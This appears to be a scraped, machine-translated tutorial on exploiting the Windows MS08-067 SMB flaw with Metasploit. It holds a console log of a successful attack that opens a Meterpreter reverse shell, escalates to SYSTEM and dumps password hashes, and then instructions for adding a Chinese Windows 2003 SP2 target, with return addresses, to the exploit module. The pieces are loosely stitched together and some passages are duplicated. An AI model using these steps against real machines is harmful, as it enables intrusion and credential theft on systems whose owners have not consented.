msf exploit(ms08_067_netapi) &gt; set RHOST 192.168.34.189
RHOST =&gt; 192.168.34.189
msf exploit(ms08_067_netapi) &gt; show options 
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.34.189   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) &gt; show options 
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.34.189   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
Step 8. Start using
msf exploit(ms08_067_netapi) &gt; exploit 
[*] Started reverse handler on 192.168.34.220:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 192.168.34.189
[*] Meterpreter session 1 opened (192.168.34.220:4444 -&gt; 192.168.34.189:1059) at 2015-09-24 14:45:52 +0800
 Step 9: Return to the shell successfully, the operation of meterpreter
meterpreter &gt; getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).hashdump 

meterpreter &gt; hashdump 
Administrator:500:0182bd0bd4444bf8aad3b435b51404ee:328727b81ca05805a68ef26acb252039:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::
IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::meterpreter &gt; shell 
Process 3368 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:WINDOWSsystem32&gt;ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 192.168.34.189
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.34.254
C:WINDOWSsystem32&gt;net user
net user
User accounts for 
-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant            
IUSR_DH-CA8822AB9589     IWAM_DH-CA8822AB9589     SUPPORT_388945a0         
The command completed with one or more errors.

For the target drone in the shared content, please search on Baidu.

Источник

MS08_067

MS08_067 is a typical buffer overflow vulnerability. The Windows Server service has a buffer overflow vulnerability when processing specially crafted RPC requests. A remote attacker can trigger this overflow by sending malicious RPC requests, resulting in a complete intrusion of the user system and executing arbitrary commands with SYSTEM privileges. . For Windows 2000, XP and Server 2003, this vulnerability can be exploited without authentication. For Windows Vista and Server 2008, authentication may be required.

  • Release Date: 2008/10/22
  • For ports: 139, 445
  • Description: Microsoft Security Bulletin KB958644
  • Vulnerability impact: A vulnerability in the server service could allow remote code execution
  • Release Date: 2008/10/22
  • Affected operating systems: Windows 2000; XP; Server 2003 is critical, Windows Vista; Server 2008; 7 Beta is important

There are also many tutorials on MS08_067 vulnerability attacks on the Internet.

However, the exploit code of MS08_067 in Kali is for the foreign language version, and there is no code for the exploit of the Chinese version of Windows 2003 server sp2. Therefore, today I mainly teach you how to use the Chinese version of 2003 server SP2.

Everyone first enter this directory:

/usr/share/metasploit-framework/modules/exploits/windows/smb

Then open the file ms08_067_netapi.rb and add the following content

 [ 'Windows 2003 SP2 Chinese (NX)',
   {
	  'RetDec'    => 0x7c99beb8,  # dec ESI, ret @NTDLL.DLL (0x4EC3)
	  'RetPop'    => 0x7cb5e84e,  # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)
	  'JmpESP'    => 0x7c99a01b,  # jmp ESP @NTDLL.DLL(0xFFE4)
	  'DisableNX' => 0x7c96f517,  # NX disable @NTDLL.DLL
          'Scratch'   => 0x00020408,
   }
],

Save and exit! To

Then we can start our attack

msfconsole #Enter msfconsle module
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
 msf exploit(ms08_067_netapi)> show targets #View the system version supported by targets

We can now see Windows 2003 SP2 Chinese (NX)

Then we set the target and options parameters

msf exploit(ms08_067_netapi) > set target 65
msf exploit(ms08_067_netapi) > set rhost 192.168.10.19
msf exploit(ms08_067_netapi) > set lhost 192.168.10.15
msf exploit(ms08_067_netapi) > exploit

You can see that the attack was successful!

Источник

Понравилась статья? Поделить с друзьями:
  • Et info windows os submitting usb metadata to microsoft
  • Esupport что за папка windows 10 можно ли удалить
  • Esu kb4528069 скачать для windows 7
  • Essential system updates for microsoft windows 7 что это
  • Essential anatomy для windows скачать торрент